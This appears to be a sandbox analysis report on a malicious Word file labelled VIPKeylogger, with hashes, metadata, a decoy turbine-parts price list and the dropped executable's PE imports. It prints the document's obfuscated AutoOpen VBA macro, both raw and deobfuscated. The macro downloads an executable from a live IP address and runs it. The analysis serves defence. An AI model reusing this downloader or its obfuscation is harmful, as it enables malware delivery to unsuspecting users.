VIPKeylogger | d9980559077d

Remarks

Maximum Dump Count Reached (0x0200005C): 447 dumps with the reason "Content Changed" were skipped because the respective maximum limit was reached.

Maximum Dump Size Exceeded (0x0200004A): 6 dump(s) were skipped because they exceeded the maximum dump size of 16 MB. The largest one was 670 MB.

Filters:

File Name	Category	Type	Verdict	Actions

C:\Users\RDhJ0CNFevzX\Desktop\754c08a32cbfe16e0982b5b56835e247.doc

Sample File

Word Document

MIME Type	application/msword
File Size	51.50 KB
MD5	754c08a32cbfe16e0982b5b56835e247
SHA1	7338cada263faae3d79631efa1c895bf690a4eb3
SHA256	d9980559077d0cf6e251608efa44277ac5cd2b64236ecc31b352a93992e2f2b7
SSDeep	384:Zp0xfMJvBv2xv8R89JMjN6m4iKpIEOqY+tKiSsqdg1vA9tzt/Mi+P0jN4pfZt8Fs:ZkUJJU6wVoJ+1o9t1MRi4pQmv+SWw
ImpHash	-

File Reputation Information

Verdict	Malicious
Names	Mal/Generic-S

Office Information

Creator	Nadine Daniel
Last Modified By	GRACE
Revision	2
Create Time	2025-01-05 22:34 (UTC+1)
Modify Time	2025-01-05 22:34 (UTC+1)
Codepage	ANSI_Latin1
Application	Microsoft Office Word
App Version	15.0
Template	Normal.dotm
Document Security	NONE
Page Count	1
Line Count	16
Paragraph Count	4
Word Count	348
Character Count	1985
Chars With Spaces	2329
Title	1
scale_crop	False
shared_doc	False

Controls (1)

CLSID	Control Name	Associated Vulnerability
{00020906-0000-0000-C000-000000000046}	Word97	-

VBA Macros (1)

Macro #1: ThisDocument

Deobfuscated Code


                   Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub AutoOpen()
    Set 0 = CreateObject("MSXML2.ServerXMLHTTP")
    Dim bStrm
    Set 0 = CreateObject("Adodb.Stream")
    0.Open "GET", "http://147.124.216.113/image.exe", False
    0.Send
    With bStrm
        .Type = 1
        .Open
        .Write 0.responsebody
        .savetofile "brightness.exe", 2
    End With
    Shell """brightness.exe"""
End Sub

Original Code


                   Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
 
Dim xHttp:
'this is a comment



Set xHttp = CreateObject("M" & "S" & "X" & "M" & "L" & "2" & "." & "S" & "er" & "ver" & "XM" & "LH" & "TTP")
'this is a comment
Dim bStrm:
'this is a comment
Set bStrm = CreateObject("Ad" & "od" & "b.S" & "tr" & "ea" & "m")



Dim nirm1
nirm1 = "h"
Dim nirm2
nirm2 = "t"
Dim nirm3
nirm3 = "t" & "p:/" & "/147.124.216.113/image"
Dim nirm4
nirm4 = "."
Dim nirm5
nirm5 = "e"
Dim nirm6
nirm6 = "x"
Dim nirm7
nirm7 = "e"



Dim plpl
plpl = nirm1 & nirm2 & nirm3 & nirm4 & nirm5 & nirm6 & nirm7

'this is a comment
xHttp.Open "GET", plpl, False
xHttp.Send




 
With bStrm
 .Type = 1
.Open
 .write xHttp.responsebody
 
 'this is a comment
 
Dim monu1
 monu1 = "brightness"
 Dim monu2
 monu2 = "."
 'this is a comment
 Dim monu3
 monu3 = "e"
 'this is a comment
 Dim monu4
 monu4 = "x"
 'this is a comment
 Dim monu5
 monu5 = "e"
 'this is a comment
 Dim monu6
 monu6 = monu1 & monu2 & monu3 & monu4 & monu5
 
 
 .savetofile monu6, 2


Dim parveen1
Dim parveen2
Dim parveen3
Dim parveen4
Dim praveen1
praveen1 = """brightness"
Dim praveen2
praveen2 = "."
'this is a comment
Dim praveen3
praveen3 = "e"
'this is a comment
Dim praveen4
praveen4 = "x"
'this is a comment
Dim praveen5
praveen5 = "e"""
'this is a comment



Dim praveen6
praveen6 = praveen1 & praveen2 & praveen3 & praveen4 & praveen5
 


End With
 
Shell (praveen6)
 
End Sub

Document Content Snippet

1Rotor .No.DY0576-201
CYRT III ELLIOTT turbine ser.No.E202202B (12.05.2003)1set$22,947.006-8 weeks2Bearing shell, lower, pos. 15 Fig. 4-12. No.412169-2
CYRT III NM802C ELLIOTT turbine ser.No.E202204B (12.05.2013)4pcs$55.00 eachStock3Bearing shell, upper pos. 16 Fig. 4-12 .No.412169-1 CYRT III NM802C ELLIOTT turbine ser.No.E202204B (12.05.2013)4pcs$247.50 eachStock4Lower bearing shell No.667997-8
CYRT III ELLIOTT turbine ser.No.E202203B (12.05.2003)2pcs$91.00 eachStock5Bearing shell 667997-7
CYRT III ELLIOTT2pcs$145.00
eachStock6Turbine overspeed shutdown mechanism
CYRT III NM802C ELLIOTT turbine ser.No.E202204B (12.05.2013)1pcs$663.00Stock7Control valve and stem assembly.No.681525-4 AYRT III ELLIOTT turbine ser.No.E202001B-1,-21set$1089.00Stock8Seal No.P725Z045
AYRT III ELLIOTT turbine ser.No.E202001B-1,-21set$24.50Stock9Valve seat and sleeve assembly .No.672078-5
AYRT III ELLIOTT turbine ser.No.E202001B-1,-21set$1980.00Stock

CFB Streams (11)

Name	ID	Size	Actions
Root\Data	1	4.50 KB	... Actions Download File
Root\Table	2	7.69 KB	... Actions Download File
Root\WordDocument	3	17.55 KB	... Actions Download File
Root\SummaryInformation	4	4.00 KB	... Actions Download File
Root\DocumentSummaryInformation	5	4.00 KB	... Actions Download File
Root\Macros\VBA\ThisDocument	8	4.69 KB	... Actions Download File
Root\Macros\VBA\_VBA_PROJECT	9	2.84 KB	... Actions Download File
Root\Macros\VBA\dir	10	522 Bytes	... Actions Download File
Root\Macros\PROJECTwm	11	41 Bytes	... Actions Download File
Root\Macros\PROJECT	12	370 Bytes	... Actions Download File
Root\CompObj	13	114 Bytes	... Actions Download File

Extracted URLs (1)

URL	WHOIS Data	Reputation Status	Recursively Submitted	Actions
http://147.124.216.113/image.exe	Not Queried	Malicious	-	... Actions Show URL Submit URL

C:\Users\Public\Libraries\Aiymwhpj.PIF

Downloaded File

Binary

Also Known As	C:\Users\RDhJ0CNFevzX\Desktop\brightness.exe (Accessed File) \??\C:\Users\Public\Libraries\Aiymwhpj.PIF (Accessed File, Downloaded File) \??\C:\Users\RDhJ0CNFevzX\Desktop\brightness.exe (Accessed File)
MIME Type	application/vnd.microsoft.portable-executable
File Size	1.10 MB
MD5	6047499517804f1ea76b508ca469de99
SHA1	ba5e8a683c8b8b54a14984d86715040d00777f11
SHA256	03b17e6fe6ce874c0cf78b2e560f5fb4106e07ce33799632b2e1bbf24e9fb371
SSDeep	24576:Gw6yj+R7ydItm/2uQAGYDKAVcpzWc4ctu:GDBR2KTYDKArc4Ku
ImpHash	44c8864bd68c3bff94639c69671ea4b7

PE Information

Image Base	0x00400000
Entry Point	0x0046E80C
Size Of Code	0x0006D000
Size Of Initialized Data	0x000AE400
File Type	IMAGE_FILE_EXECUTABLE_IMAGE
Subsystem	IMAGE_SUBSYSTEM_WINDOWS_GUI
Machine Type	IMAGE_FILE_MACHINE_I386
Compile Timestamp	1992-06-20 00:22 (UTC+2)
Packer	BobSoft Mini Delphi -> BoB / BobSoft

Sections (9)

Name	Virtual Address	Virtual Size	Raw Data Size	Raw Data Offset	Flags	Entropy
.text	0x00401000	0x0006C4C0	0x0006C600	0x00000400	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ	6.53
.itext	0x0046E000	0x00000848	0x00000A00	0x0006CA00	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ	5.55
.data	0x0046F000	0x00001F40	0x00002000	0x0006D400	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE	3.8
.bss	0x00471000	0x000036EC	0x00000000	0x0006F400	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE	0.0
.idata	0x00475000	0x0000266E	0x00002800	0x0006F400	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE	4.87
.tls	0x00478000	0x00000034	0x00000000	0x00071C00	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE	0.0
.rdata	0x00479000	0x00000018	0x00000200	0x00071C00	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ	0.21
.reloc	0x0047A000	0x00007CE8	0x00007E00	0x00071E00	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ	6.68
.rsrc	0x00482000	0x000A1C00	0x000A1C00	0x00079C00	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ	7.09

Imports (16)

oleaut32.dll (3)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
SysFreeString	-	0x00475754	0x00075154	0x0006F554	0x00000000
SysReAllocStringLen	-	0x00475758	0x00075158	0x0006F558	0x00000000
SysAllocStringLen	-	0x0047575C	0x0007515C	0x0006F55C	0x00000000

advapi32.dll (3)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
RegQueryValueExA	-	0x00475764	0x00075164	0x0006F564	0x00000000
RegOpenKeyExA	-	0x00475768	0x00075168	0x0006F568	0x00000000
RegCloseKey	-	0x0047576C	0x0007516C	0x0006F56C	0x00000000

user32.dll (5)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
GetKeyboardType	-	0x00475774	0x00075174	0x0006F574	0x00000000
DestroyWindow	-	0x00475778	0x00075178	0x0006F578	0x00000000
LoadStringA	-	0x0047577C	0x0007517C	0x0006F57C	0x00000000
MessageBoxA	-	0x00475780	0x00075180	0x0006F580	0x00000000
CharNextA	-	0x00475784	0x00075184	0x0006F584	0x00000000

kernel32.dll (30)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
GetACP	-	0x0047578C	0x0007518C	0x0006F58C	0x00000000
Sleep	-	0x00475790	0x00075190	0x0006F590	0x00000000
VirtualFree	-	0x00475794	0x00075194	0x0006F594	0x00000000
VirtualAlloc	-	0x00475798	0x00075198	0x0006F598	0x00000000
GetCurrentThreadId	-	0x0047579C	0x0007519C	0x0006F59C	0x00000000
InterlockedDecrement	-	0x004757A0	0x000751A0	0x0006F5A0	0x00000000
InterlockedIncrement	-	0x004757A4	0x000751A4	0x0006F5A4	0x00000000
VirtualQuery	-	0x004757A8	0x000751A8	0x0006F5A8	0x00000000
WideCharToMultiByte	-	0x004757AC	0x000751AC	0x0006F5AC	0x00000000
MultiByteToWideChar	-	0x004757B0	0x000751B0	0x0006F5B0	0x00000000
lstrlenA	-	0x004757B4	0x000751B4	0x0006F5B4	0x00000000
lstrcpynA	-	0x004757B8	0x000751B8	0x0006F5B8	0x00000000
LoadLibraryExA	-	0x004757BC	0x000751BC	0x0006F5BC	0x00000000
GetThreadLocale	-	0x004757C0	0x000751C0	0x0006F5C0	0x00000000
GetStartupInfoA	-	0x004757C4	0x000751C4	0x0006F5C4	0x00000000
GetProcAddress	-	0x004757C8	0x000751C8	0x0006F5C8	0x00000000
GetModuleHandleA	-	0x004757CC	0x000751CC	0x0006F5CC	0x00000000
GetModuleFileNameA	-	0x004757D0	0x000751D0	0x0006F5D0	0x00000000
GetLocaleInfoA	-	0x004757D4	0x000751D4	0x0006F5D4	0x00000000
GetCommandLineA	-	0x004757D8	0x000751D8	0x0006F5D8	0x00000000
FreeLibrary	-	0x004757DC	0x000751DC	0x0006F5DC	0x00000000
FindFirstFileA	-	0x004757E0	0x000751E0	0x0006F5E0	0x00000000
FindClose	-	0x004757E4	0x000751E4	0x0006F5E4	0x00000000
ExitProcess	-	0x004757E8	0x000751E8	0x0006F5E8	0x00000000
CompareStringA	-	0x004757EC	0x000751EC	0x0006F5EC	0x00000000
WriteFile	-	0x004757F0	0x000751F0	0x0006F5F0	0x00000000
UnhandledExceptionFilter	-	0x004757F4	0x000751F4	0x0006F5F4	0x00000000
RtlUnwind	-	0x004757F8	0x000751F8	0x0006F5F8	0x00000000
RaiseException	-	0x004757FC	0x000751FC	0x0006F5FC	0x00000000
GetStdHandle	-	0x00475800	0x00075200	0x0006F600	0x00000000

kernel32.dll (4)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
TlsSetValue	-	0x00475808	0x00075208	0x0006F608	0x00000000
TlsGetValue	-	0x0047580C	0x0007520C	0x0006F60C	0x00000000
LocalAlloc	-	0x00475810	0x00075210	0x0006F610	0x00000000
GetModuleHandleA	-	0x00475814	0x00075214	0x0006F614	0x00000000

user32.dll (164)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
CreateWindowExA	-	0x0047581C	0x0007521C	0x0006F61C	0x00000000
WindowFromPoint	-	0x00475820	0x00075220	0x0006F620	0x00000000
WaitMessage	-	0x00475824	0x00075224	0x0006F624	0x00000000
UpdateWindow	-	0x00475828	0x00075228	0x0006F628	0x00000000
UnregisterClassA	-	0x0047582C	0x0007522C	0x0006F62C	0x00000000
UnhookWindowsHookEx	-	0x00475830	0x00075230	0x0006F630	0x00000000
TranslateMessage	-	0x00475834	0x00075234	0x0006F634	0x00000000
TranslateMDISysAccel	-	0x00475838	0x00075238	0x0006F638	0x00000000
TrackPopupMenu	-	0x0047583C	0x0007523C	0x0006F63C	0x00000000
SystemParametersInfoA	-	0x00475840	0x00075240	0x0006F640	0x00000000
ShowWindow	-	0x00475844	0x00075244	0x0006F644	0x00000000
ShowScrollBar	-	0x00475848	0x00075248	0x0006F648	0x00000000
ShowOwnedPopups	-	0x0047584C	0x0007524C	0x0006F64C	0x00000000
SetWindowsHookExA	-	0x00475850	0x00075250	0x0006F650	0x00000000
SetWindowPos	-	0x00475854	0x00075254	0x0006F654	0x00000000
SetWindowPlacement	-	0x00475858	0x00075258	0x0006F658	0x00000000
SetWindowLongW	-	0x0047585C	0x0007525C	0x0006F65C	0x00000000
SetWindowLongA	-	0x00475860	0x00075260	0x0006F660	0x00000000
SetTimer	-	0x00475864	0x00075264	0x0006F664	0x00000000
SetScrollRange	-	0x00475868	0x00075268	0x0006F668	0x00000000
SetScrollPos	-	0x0047586C	0x0007526C	0x0006F66C	0x00000000
SetScrollInfo	-	0x00475870	0x00075270	0x0006F670	0x00000000
SetRect	-	0x00475874	0x00075274	0x0006F674	0x00000000
SetPropA	-	0x00475878	0x00075278	0x0006F678	0x00000000
SetParent	-	0x0047587C	0x0007527C	0x0006F67C	0x00000000
SetMenuItemInfoA	-	0x00475880	0x00075280	0x0006F680	0x00000000
SetMenu	-	0x00475884	0x00075284	0x0006F684	0x00000000
SetForegroundWindow	-	0x00475888	0x00075288	0x0006F688	0x00000000
SetFocus	-	0x0047588C	0x0007528C	0x0006F68C	0x00000000
SetCursor	-	0x00475890	0x00075290	0x0006F690	0x00000000
SetClassLongA	-	0x00475894	0x00075294	0x0006F694	0x00000000
SetCapture	-	0x00475898	0x00075298	0x0006F698	0x00000000
SetActiveWindow	-	0x0047589C	0x0007529C	0x0006F69C	0x00000000
SendMessageW	-	0x004758A0	0x000752A0	0x0006F6A0	0x00000000
SendMessageA	-	0x004758A4	0x000752A4	0x0006F6A4	0x00000000
ScrollWindow	-	0x004758A8	0x000752A8	0x0006F6A8	0x00000000
ScreenToClient	-	0x004758AC	0x000752AC	0x0006F6AC	0x00000000
RemovePropA	-	0x004758B0	0x000752B0	0x0006F6B0	0x00000000
RemoveMenu	-	0x004758B4	0x000752B4	0x0006F6B4	0x00000000
ReleaseDC	-	0x004758B8	0x000752B8	0x0006F6B8	0x00000000
ReleaseCapture	-	0x004758BC	0x000752BC	0x0006F6BC	0x00000000
RegisterWindowMessageA	-	0x004758C0	0x000752C0	0x0006F6C0	0x00000000
RegisterClipboardFormatA	-	0x004758C4	0x000752C4	0x0006F6C4	0x00000000
RegisterClassA	-	0x004758C8	0x000752C8	0x0006F6C8	0x00000000
RedrawWindow	-	0x004758CC	0x000752CC	0x0006F6CC	0x00000000
PtInRect	-	0x004758D0	0x000752D0	0x0006F6D0	0x00000000
PostQuitMessage	-	0x004758D4	0x000752D4	0x0006F6D4	0x00000000
PostMessageA	-	0x004758D8	0x000752D8	0x0006F6D8	0x00000000
PeekMessageW	-	0x004758DC	0x000752DC	0x0006F6DC	0x00000000
PeekMessageA	-	0x004758E0	0x000752E0	0x0006F6E0	0x00000000
OffsetRect	-	0x004758E4	0x000752E4	0x0006F6E4	0x00000000
OemToCharA	-	0x004758E8	0x000752E8	0x0006F6E8	0x00000000
MessageBoxA	-	0x004758EC	0x000752EC	0x0006F6EC	0x00000000
MapWindowPoints	-	0x004758F0	0x000752F0	0x0006F6F0	0x00000000
MapVirtualKeyA	-	0x004758F4	0x000752F4	0x0006F6F4	0x00000000
LoadStringA	-	0x004758F8	0x000752F8	0x0006F6F8	0x00000000
LoadKeyboardLayoutA	-	0x004758FC	0x000752FC	0x0006F6FC	0x00000000
LoadIconA	-	0x00475900	0x00075300	0x0006F700	0x00000000
LoadCursorA	-	0x00475904	0x00075304	0x0006F704	0x00000000
LoadBitmapA	-	0x00475908	0x00075308	0x0006F708	0x00000000
KillTimer	-	0x0047590C	0x0007530C	0x0006F70C	0x00000000
IsZoomed	-	0x00475910	0x00075310	0x0006F710	0x00000000
IsWindowVisible	-	0x00475914	0x00075314	0x0006F714	0x00000000
IsWindowUnicode	-	0x00475918	0x00075318	0x0006F718	0x00000000
IsWindowEnabled	-	0x0047591C	0x0007531C	0x0006F71C	0x00000000
IsWindow	-	0x00475920	0x00075320	0x0006F720	0x00000000
IsRectEmpty	-	0x00475924	0x00075324	0x0006F724	0x00000000
IsIconic	-	0x00475928	0x00075328	0x0006F728	0x00000000
IsDialogMessageW	-	0x0047592C	0x0007532C	0x0006F72C	0x00000000
IsDialogMessageA	-	0x00475930	0x00075330	0x0006F730	0x00000000
IsChild	-	0x00475934	0x00075334	0x0006F734	0x00000000
InvalidateRect	-	0x00475938	0x00075338	0x0006F738	0x00000000
IntersectRect	-	0x0047593C	0x0007533C	0x0006F73C	0x00000000
InsertMenuItemA	-	0x00475940	0x00075340	0x0006F740	0x00000000
InsertMenuA	-	0x00475944	0x00075344	0x0006F744	0x00000000
InflateRect	-	0x00475948	0x00075348	0x0006F748	0x00000000
GetWindowThreadProcessId	-	0x0047594C	0x0007534C	0x0006F74C	0x00000000
GetWindowTextA	-	0x00475950	0x00075350	0x0006F750	0x00000000
GetWindowRect	-	0x00475954	0x00075354	0x0006F754	0x00000000
GetWindowPlacement	-	0x00475958	0x00075358	0x0006F758	0x00000000
GetWindowLongW	-	0x0047595C	0x0007535C	0x0006F75C	0x00000000
GetWindowLongA	-	0x00475960	0x00075360	0x0006F760	0x00000000
GetWindowDC	-	0x00475964	0x00075364	0x0006F764	0x00000000
GetTopWindow	-	0x00475968	0x00075368	0x0006F768	0x00000000
GetSystemMetrics	-	0x0047596C	0x0007536C	0x0006F76C	0x00000000
GetSystemMenu	-	0x00475970	0x00075370	0x0006F770	0x00000000
GetSysColorBrush	-	0x00475974	0x00075374	0x0006F774	0x00000000
GetSysColor	-	0x00475978	0x00075378	0x0006F778	0x00000000
GetSubMenu	-	0x0047597C	0x0007537C	0x0006F77C	0x00000000
GetScrollRange	-	0x00475980	0x00075380	0x0006F780	0x00000000
GetScrollPos	-	0x00475984	0x00075384	0x0006F784	0x00000000
GetScrollInfo	-	0x00475988	0x00075388	0x0006F788	0x00000000
GetPropA	-	0x0047598C	0x0007538C	0x0006F78C	0x00000000
GetParent	-	0x00475990	0x00075390	0x0006F790	0x00000000
GetWindow	-	0x00475994	0x00075394	0x0006F794	0x00000000
GetMessagePos	-	0x00475998	0x00075398	0x0006F798	0x00000000
GetMenuStringA	-	0x0047599C	0x0007539C	0x0006F79C	0x00000000
GetMenuState	-	0x004759A0	0x000753A0	0x0006F7A0	0x00000000
GetMenuItemInfoA	-	0x004759A4	0x000753A4	0x0006F7A4	0x00000000
GetMenuItemID	-	0x004759A8	0x000753A8	0x0006F7A8	0x00000000
GetMenuItemCount	-	0x004759AC	0x000753AC	0x0006F7AC	0x00000000
GetMenu	-	0x004759B0	0x000753B0	0x0006F7B0	0x00000000
GetLastActivePopup	-	0x004759B4	0x000753B4	0x0006F7B4	0x00000000
GetKeyboardState	-	0x004759B8	0x000753B8	0x0006F7B8	0x00000000
GetKeyboardLayoutNameA	-	0x004759BC	0x000753BC	0x0006F7BC	0x00000000
GetKeyboardLayoutList	-	0x004759C0	0x000753C0	0x0006F7C0	0x00000000
GetKeyboardLayout	-	0x004759C4	0x000753C4	0x0006F7C4	0x00000000
GetKeyState	-	0x004759C8	0x000753C8	0x0006F7C8	0x00000000
GetKeyNameTextA	-	0x004759CC	0x000753CC	0x0006F7CC	0x00000000
GetIconInfo	-	0x004759D0	0x000753D0	0x0006F7D0	0x00000000
GetForegroundWindow	-	0x004759D4	0x000753D4	0x0006F7D4	0x00000000
GetFocus	-	0x004759D8	0x000753D8	0x0006F7D8	0x00000000
GetDlgItem	-	0x004759DC	0x000753DC	0x0006F7DC	0x00000000
GetDesktopWindow	-	0x004759E0	0x000753E0	0x0006F7E0	0x00000000
GetDCEx	-	0x004759E4	0x000753E4	0x0006F7E4	0x00000000
GetDC	-	0x004759E8	0x000753E8	0x0006F7E8	0x00000000
GetCursorPos	-	0x004759EC	0x000753EC	0x0006F7EC	0x00000000
GetCursor	-	0x004759F0	0x000753F0	0x0006F7F0	0x00000000
GetClientRect	-	0x004759F4	0x000753F4	0x0006F7F4	0x00000000
GetClassLongA	-	0x004759F8	0x000753F8	0x0006F7F8	0x00000000
GetClassInfoA	-	0x004759FC	0x000753FC	0x0006F7FC	0x00000000
GetCapture	-	0x00475A00	0x00075400	0x0006F800	0x00000000
GetActiveWindow	-	0x00475A04	0x00075404	0x0006F804	0x00000000
FrameRect	-	0x00475A08	0x00075408	0x0006F808	0x00000000
FindWindowA	-	0x00475A0C	0x0007540C	0x0006F80C	0x00000000
FillRect	-	0x00475A10	0x00075410	0x0006F810	0x00000000
EqualRect	-	0x00475A14	0x00075414	0x0006F814	0x00000000
EnumWindows	-	0x00475A18	0x00075418	0x0006F818	0x00000000
EnumThreadWindows	-	0x00475A1C	0x0007541C	0x0006F81C	0x00000000
EnumChildWindows	-	0x00475A20	0x00075420	0x0006F820	0x00000000
EndPaint	-	0x00475A24	0x00075424	0x0006F824	0x00000000
EnableWindow	-	0x00475A28	0x00075428	0x0006F828	0x00000000
EnableScrollBar	-	0x00475A2C	0x0007542C	0x0006F82C	0x00000000
EnableMenuItem	-	0x00475A30	0x00075430	0x0006F830	0x00000000
DrawTextA	-	0x00475A34	0x00075434	0x0006F834	0x00000000
DrawMenuBar	-	0x00475A38	0x00075438	0x0006F838	0x00000000
DrawIconEx	-	0x00475A3C	0x0007543C	0x0006F83C	0x00000000
DrawIcon	-	0x00475A40	0x00075440	0x0006F840	0x00000000
DrawFrameControl	-	0x00475A44	0x00075444	0x0006F844	0x00000000
DrawFocusRect	-	0x00475A48	0x00075448	0x0006F848	0x00000000
DrawEdge	-	0x00475A4C	0x0007544C	0x0006F84C	0x00000000
DispatchMessageW	-	0x00475A50	0x00075450	0x0006F850	0x00000000
DispatchMessageA	-	0x00475A54	0x00075454	0x0006F854	0x00000000
DestroyWindow	-	0x00475A58	0x00075458	0x0006F858	0x00000000
DestroyMenu	-	0x00475A5C	0x0007545C	0x0006F85C	0x00000000
DestroyIcon	-	0x00475A60	0x00075460	0x0006F860	0x00000000
DestroyCursor	-	0x00475A64	0x00075464	0x0006F864	0x00000000
DeleteMenu	-	0x00475A68	0x00075468	0x0006F868	0x00000000
DefWindowProcA	-	0x00475A6C	0x0007546C	0x0006F86C	0x00000000
DefMDIChildProcA	-	0x00475A70	0x00075470	0x0006F870	0x00000000
DefFrameProcA	-	0x00475A74	0x00075474	0x0006F874	0x00000000
CreatePopupMenu	-	0x00475A78	0x00075478	0x0006F878	0x00000000
CreateMenu	-	0x00475A7C	0x0007547C	0x0006F87C	0x00000000
CreateIcon	-	0x00475A80	0x00075480	0x0006F880	0x00000000
ClientToScreen	-	0x00475A84	0x00075484	0x0006F884	0x00000000
CheckMenuItem	-	0x00475A88	0x00075488	0x0006F888	0x00000000
CallWindowProcA	-	0x00475A8C	0x0007548C	0x0006F88C	0x00000000
CallNextHookEx	-	0x00475A90	0x00075490	0x0006F890	0x00000000
BeginPaint	-	0x00475A94	0x00075494	0x0006F894	0x00000000
CharNextA	-	0x00475A98	0x00075498	0x0006F898	0x00000000
CharLowerA	-	0x00475A9C	0x0007549C	0x0006F89C	0x00000000
CharToOemA	-	0x00475AA0	0x000754A0	0x0006F8A0	0x00000000
AdjustWindowRectEx	-	0x00475AA4	0x000754A4	0x0006F8A4	0x00000000
ActivateKeyboardLayout	-	0x00475AA8	0x000754A8	0x0006F8A8	0x00000000

gdi32.dll (57)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
UnrealizeObject	-	0x00475AB0	0x000754B0	0x0006F8B0	0x00000000
StretchBlt	-	0x00475AB4	0x000754B4	0x0006F8B4	0x00000000
SetWindowOrgEx	-	0x00475AB8	0x000754B8	0x0006F8B8	0x00000000
SetViewportOrgEx	-	0x00475ABC	0x000754BC	0x0006F8BC	0x00000000
SetTextColor	-	0x00475AC0	0x000754C0	0x0006F8C0	0x00000000
SetStretchBltMode	-	0x00475AC4	0x000754C4	0x0006F8C4	0x00000000
SetROP2	-	0x00475AC8	0x000754C8	0x0006F8C8	0x00000000
SetPixel	-	0x00475ACC	0x000754CC	0x0006F8CC	0x00000000
SetDIBColorTable	-	0x00475AD0	0x000754D0	0x0006F8D0	0x00000000
SetBrushOrgEx	-	0x00475AD4	0x000754D4	0x0006F8D4	0x00000000
SetBkMode	-	0x00475AD8	0x000754D8	0x0006F8D8	0x00000000
SetBkColor	-	0x00475ADC	0x000754DC	0x0006F8DC	0x00000000
SelectPalette	-	0x00475AE0	0x000754E0	0x0006F8E0	0x00000000
SelectObject	-	0x00475AE4	0x000754E4	0x0006F8E4	0x00000000
SaveDC	-	0x00475AE8	0x000754E8	0x0006F8E8	0x00000000
RestoreDC	-	0x00475AEC	0x000754EC	0x0006F8EC	0x00000000
RectVisible	-	0x00475AF0	0x000754F0	0x0006F8F0	0x00000000
RealizePalette	-	0x00475AF4	0x000754F4	0x0006F8F4	0x00000000
Polyline	-	0x00475AF8	0x000754F8	0x0006F8F8	0x00000000
PatBlt	-	0x00475AFC	0x000754FC	0x0006F8FC	0x00000000
MoveToEx	-	0x00475B00	0x00075500	0x0006F900	0x00000000
MaskBlt	-	0x00475B04	0x00075504	0x0006F904	0x00000000
LineTo	-	0x00475B08	0x00075508	0x0006F908	0x00000000
IntersectClipRect	-	0x00475B0C	0x0007550C	0x0006F90C	0x00000000
GetWindowOrgEx	-	0x00475B10	0x00075510	0x0006F910	0x00000000
GetTextMetricsA	-	0x00475B14	0x00075514	0x0006F914	0x00000000
GetTextExtentPoint32A	-	0x00475B18	0x00075518	0x0006F918	0x00000000
GetSystemPaletteEntries	-	0x00475B1C	0x0007551C	0x0006F91C	0x00000000
GetStockObject	-	0x00475B20	0x00075520	0x0006F920	0x00000000
GetRgnBox	-	0x00475B24	0x00075524	0x0006F924	0x00000000
GetPixel	-	0x00475B28	0x00075528	0x0006F928	0x00000000
GetPaletteEntries	-	0x00475B2C	0x0007552C	0x0006F92C	0x00000000
GetObjectA	-	0x00475B30	0x00075530	0x0006F930	0x00000000
GetDeviceCaps	-	0x00475B34	0x00075534	0x0006F934	0x00000000
GetDIBits	-	0x00475B38	0x00075538	0x0006F938	0x00000000
GetDIBColorTable	-	0x00475B3C	0x0007553C	0x0006F93C	0x00000000
GetDCOrgEx	-	0x00475B40	0x00075540	0x0006F940	0x00000000
GetCurrentPositionEx	-	0x00475B44	0x00075544	0x0006F944	0x00000000
GetClipBox	-	0x00475B48	0x00075548	0x0006F948	0x00000000
GetBrushOrgEx	-	0x00475B4C	0x0007554C	0x0006F94C	0x00000000
GetBitmapBits	-	0x00475B50	0x00075550	0x0006F950	0x00000000
GdiFlush	-	0x00475B54	0x00075554	0x0006F954	0x00000000
ExcludeClipRect	-	0x00475B58	0x00075558	0x0006F958	0x00000000
DeleteObject	-	0x00475B5C	0x0007555C	0x0006F95C	0x00000000
DeleteDC	-	0x00475B60	0x00075560	0x0006F960	0x00000000
CreateSolidBrush	-	0x00475B64	0x00075564	0x0006F964	0x00000000
CreatePenIndirect	-	0x00475B68	0x00075568	0x0006F968	0x00000000
CreatePalette	-	0x00475B6C	0x0007556C	0x0006F96C	0x00000000
CreateHalftonePalette	-	0x00475B70	0x00075570	0x0006F970	0x00000000
CreateFontIndirectA	-	0x00475B74	0x00075574	0x0006F974	0x00000000
CreateDIBitmap	-	0x00475B78	0x00075578	0x0006F978	0x00000000
CreateDIBSection	-	0x00475B7C	0x0007557C	0x0006F97C	0x00000000
CreateCompatibleDC	-	0x00475B80	0x00075580	0x0006F980	0x00000000
CreateCompatibleBitmap	-	0x00475B84	0x00075584	0x0006F984	0x00000000
CreateBrushIndirect	-	0x00475B88	0x00075588	0x0006F988	0x00000000
CreateBitmap	-	0x00475B8C	0x0007558C	0x0006F98C	0x00000000
BitBlt	-	0x00475B90	0x00075590	0x0006F990	0x00000000

version.dll (3)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
VerQueryValueA	-	0x00475B98	0x00075598	0x0006F998	0x00000000
